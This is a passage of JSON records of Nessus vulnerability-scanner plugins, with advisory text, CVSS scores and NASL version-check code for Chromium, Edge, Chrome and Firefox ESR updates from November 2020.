"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-24T15:05:30", "description": "This update for chromium fixes the following issues :\n\n - Update to 86.0.4240.183 boo#1178375\n\n - CVE-2020-16004: Use after free in user interface.\n\n - CVE-2020-16005: Insufficient policy enforcement in ANGLE.\n\n - CVE-2020-16006: Inappropriate implementation in V8\n\n - CVE-2020-16007: Insufficient data validation in installer.\n\n - CVE-2020-16008: Stack-based buffer overflow in WebRTC.\n\n - CVE-2020-16009: Inappropriate implementation in V8.\n\n - CVE-2020-16011: Heap buffer overflow in UI on Windows.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2020-11-06T00:00:00", "type": "nessus", "title": "openSUSE Security Update : chromium (openSUSE-2020-1831)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16004", "CVE-2020-16005", "CVE-2020-16006", "CVE-2020-16007", "CVE-2020-16008", "CVE-2020-16009", "CVE-2020-16011"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "cpe:/o:novell:opensuse:15.1", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2020-1831.NASL", "href": "https://www.tenable.com/plugins/nessus/142555", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1831.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142555);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-16004\",\n \"CVE-2020-16005\",\n \"CVE-2020-16006\",\n \"CVE-2020-16007\",\n \"CVE-2020-16008\",\n \"CVE-2020-16009\",\n \"CVE-2020-16011\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2020-1831)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for chromium fixes the following issues :\n\n - Update to 86.0.4240.183 boo#1178375\n\n - CVE-2020-16004: Use after free in user interface.\n\n - CVE-2020-16005: Insufficient policy enforcement in\n ANGLE.\n\n - CVE-2020-16006: Inappropriate implementation in V8\n\n - CVE-2020-16007: Insufficient data validation in\n installer.\n\n - CVE-2020-16008: Stack-based buffer overflow in WebRTC.\n\n - CVE-2020-16009: Inappropriate implementation in V8.\n\n - CVE-2020-16011: Heap buffer overflow in UI on Windows.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1178375\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16011\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1|SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1 / 15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-86.0.4240.183-lp151.2.150.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-debuginfo-86.0.4240.183-lp151.2.150.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-86.0.4240.183-lp151.2.150.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debuginfo-86.0.4240.183-lp151.2.150.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromedriver-86.0.4240.183-lp152.2.45.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromedriver-debuginfo-86.0.4240.183-lp152.2.45.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromium-86.0.4240.183-lp152.2.45.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromium-debuginfo-86.0.4240.183-lp152.2.45.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-26T14:59:58", "description": "The version of Microsoft Edge installed on the remote Windows host is prior to 86.0.622.63. It is, therefore, affected by multiple vulnerabilities as referenced in the ADV200002-11-4-2020 advisory.\n\n - Use after free in user interface in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2020-16004)\n\n - Insufficient policy enforcement in ANGLE in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2020-16005)\n\n - Inappropriate implementation in V8 in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2020-16006, CVE-2020-16009)\n\n - Insufficient data validation in installer in Google Chrome prior to 86.0.4240.183 allowed a local attacker to potentially elevate privilege via a crafted filesystem. (CVE-2020-16007)\n\n - Stack buffer overflow in WebRTC in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit stack corruption via a crafted WebRTC packet. (CVE-2020-16008)\n\n - Heap buffer overflow in UI in Google Chrome on Windows prior to 86.0.4240.183 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.\n (CVE-2020-16011)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2020-11-04T00:00:00", "type": "nessus", "title": "Microsoft Edge (Chromium) < 86.0.622.63 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16004", "CVE-2020-16005", "CVE-2020-16006", "CVE-2020-16007", "CVE-2020-16008", "CVE-2020-16009", "CVE-2020-16011"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_86_0_622_63.NASL", "href": "https://www.tenable.com/plugins/nessus/142456", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142456);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-16004\",\n \"CVE-2020-16005\",\n \"CVE-2020-16006\",\n \"CVE-2020-16007\",\n \"CVE-2020-16008\",\n \"CVE-2020-16009\",\n \"CVE-2020-16011\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Microsoft Edge (Chromium) < 86.0.622.63 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge installed on the remote Windows host is prior to 86.0.622.63. It is, therefore, affected\nby multiple vulnerabilities as referenced in the ADV200002-11-4-2020 advisory.\n\n - Use after free in user interface in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2020-16004)\n\n - Insufficient policy enforcement in ANGLE in Google Chrome prior to 86.0.4240.183 allowed a remote attacker\n to potentially exploit heap corruption via a crafted HTML page. (CVE-2020-16005)\n\n - Inappropriate implementation in V8 in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2020-16006, CVE-2020-16009)\n\n - Insufficient data validation in installer in Google Chrome prior to 86.0.4240.183 allowed a local attacker\n to potentially elevate privilege via a crafted filesystem. (CVE-2020-16007)\n\n - Stack buffer overflow in WebRTC in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to\n potentially exploit stack corruption via a crafted WebRTC packet. (CVE-2020-16008)\n\n - Heap buffer overflow in UI in Google Chrome on Windows prior to 86.0.4240.183 allowed a remote attacker\n who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.\n (CVE-2020-16011)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200002\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?083510ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge version 86.0.622.63 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16011\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\nget_kb_item_or_exit('SMB/Registry/Enumerated');\napp_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\nconstraints = [\n { 'fixed_version' : '86.0.622.63' }\n];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-24T15:02:24", "description": "Chrome Releases reports :\n\nThis release contains 10 security fixes, including :\n\n- [1138911] High CVE-2020-16004: Use after free in user interface.\nReported by Leecraso and Guang Gong of 360 Alpha Lab working with 360 BugCloud on 2020-10-15\n\n- [1139398] High CVE-2020-16005: Insufficient policy enforcement in ANGLE. Reported by Jaehun Jeong (@n3sk) of Theori on 2020-10-16\n\n- [1133527] High CVE-2020-16006: Inappropriate implementation in V8.\nReported by Bill Parks on 2020-09-29\n\n- [1125018] High CVE-2020-16007: Insufficient data validation in installer. Reported by Abdelhamid Naceri (halov) on 2020-09-04\n\n- [1134107] High CVE-2020-16008: Stack buffer overflow in WebRTC.\nReported by Tolya Korniltsev on 2020-10-01\n\n- [1143772] High CVE-2020-16009: Inappropriate implementation in V8.\nReported by Clement Lecigne of Google's Threat Analysis Group and Samuel Gross of Google Project Zero on 2020-10-29\n\n- [1144489] High CVE-2020-16011: Heap buffer overflow in UI on Windows. Reported by Sergei Glazunov of Google Project Zero on 2020-11-01\n\nThere are reports that an exploit for CVE-2020-16009 exists in the wild.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2020-11-06T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (3ec6ab59-1e0c-11eb-a428-3065ec8fd3ec)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16004", "CVE-2020-16005", "CVE-2020-16006", "CVE-2020-16007", "CVE-2020-16008", "CVE-2020-16009", "CVE-2020-16011"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_3EC6AB591E0C11EBA4283065EC8FD3EC.NASL", "href": "https://www.tenable.com/plugins/nessus/142539", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142539);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-16004\",\n \"CVE-2020-16005\",\n \"CVE-2020-16006\",\n \"CVE-2020-16007\",\n \"CVE-2020-16008\",\n \"CVE-2020-16009\",\n \"CVE-2020-16011\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (3ec6ab59-1e0c-11eb-a428-3065ec8fd3ec)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Chrome Releases reports :\n\nThis release contains 10 security fixes, including :\n\n- [1138911] High CVE-2020-16004: Use after free in user interface.\nReported by Leecraso and Guang Gong of 360 Alpha Lab working with 360\nBugCloud on 2020-10-15\n\n- [1139398] High CVE-2020-16005: Insufficient policy enforcement in\nANGLE. Reported by Jaehun Jeong (@n3sk) of Theori on 2020-10-16\n\n- [1133527] High CVE-2020-16006: Inappropriate implementation in V8.\nReported by Bill Parks on 2020-09-29\n\n- [1125018] High CVE-2020-16007: Insufficient data validation in\ninstaller. Reported by Abdelhamid Naceri (halov) on 2020-09-04\n\n- [1134107] High CVE-2020-16008: Stack buffer overflow in WebRTC.\nReported by Tolya Korniltsev on 2020-10-01\n\n- [1143772] High CVE-2020-16009: Inappropriate implementation in V8.\nReported by Clement Lecigne of Google's Threat Analysis Group and\nSamuel Gross of Google Project Zero on 2020-10-29\n\n- [1144489] High CVE-2020-16011: Heap buffer overflow in UI on\nWindows. Reported by Sergei Glazunov of Google Project Zero on\n2020-11-01\n\nThere are reports that an exploit for CVE-2020-16009 exists in the\nwild.\");\n # https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?74346d34\");\n # https://vuxml.freebsd.org/freebsd/3ec6ab59-1e0c-11eb-a428-3065ec8fd3ec.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?86d292f4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16011\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<86.0.4240.183\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-24T15:05:32", "description": "The version of Google Chrome installed on the remote macOS host is prior to 86.0.4240.183. It is, therefore, affected by multiple vulnerabilities as referenced in the 2020_11_stable-channel-update-for-desktop advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2020-11-02T00:00:00", "type": "nessus", "title": "Google Chrome < 86.0.4240.183 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16004", "CVE-2020-16005", "CVE-2020-16006", "CVE-2020-16007", "CVE-2020-16008", "CVE-2020-16009", "CVE-2020-16011"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_86_0_4240_183.NASL", "href": "https://www.tenable.com/plugins/nessus/142208", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142208);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-16004\",\n \"CVE-2020-16005\",\n \"CVE-2020-16006\",\n \"CVE-2020-16007\",\n \"CVE-2020-16008\",\n \"CVE-2020-16009\",\n \"CVE-2020-16011\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0486-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Google Chrome < 86.0.4240.183 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 86.0.4240.183. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the 2020_11_stable-channel-update-for-desktop advisory. Note that Nessus has\nnot tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?74346d34\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1138911\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1139398\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1133527\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1125018\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1134107\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1143772\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1144489\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 86.0.4240.183 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16011\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'86.0.4240.183', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-21T14:40:38", "description": "The version of Firefox ESR installed on the remote macOS or Mac OS X host is prior to 78.5. It is, therefore, affected by multiple vulnerabilities as referenced in the mfsa2020-51 advisory.\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-11-17T00:00:00", "type": "nessus", "title": "Mozilla Firefox ESR < 78.5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999", "CVE-2020-16012", "CVE-2020-26951", "CVE-2020-26953", "CVE-2020-26956", "CVE-2020-26958", "CVE-2020-26959", "CVE-2020-26960", "CVE-2020-26961", "CVE-2020-26965", "CVE-2020-26966", "CVE-2020-26968"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:mozilla:firefox_esr"], "id": "MACOS_FIREFOX_78_5_ESR.NASL", "href": "https://www.tenable.com/plugins/nessus/142912", "sourceData": "## \n# (C) Tenable Network Security, Inc.\n# \n# The descriptive text and package checks in this plugin were\n# extracted from Mozilla Foundation Security Advisory mfsa2020-51.\n# The text itself is copyright (C) Mozilla Foundation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142912);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-15999\",\n \"CVE-2020-16012\",\n \"CVE-2020-26951\",\n \"CVE-2020-26953\",\n \"CVE-2020-26956\",\n \"CVE-2020-26958\",\n \"CVE-2020-26959\",\n \"CVE-2020-26960\",\n \"CVE-2020-26961\",\n \"CVE-2020-26965\",\n \"CVE-2020-26966\",\n \"CVE-2020-26968\"\n );\n script_xref(name:\"MFSA\", value:\"2020-51\");\n script_xref(name:\"IAVA\", value:\"2020-A-0537-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Mozilla Firefox ESR < 78.5\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Firefox ESR installed on the remote macOS or Mac OS X host is prior to 78.5. It is, therefore, affected\nby multiple vulnerabilities as referenced in the mfsa2020-51 advisory.\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n 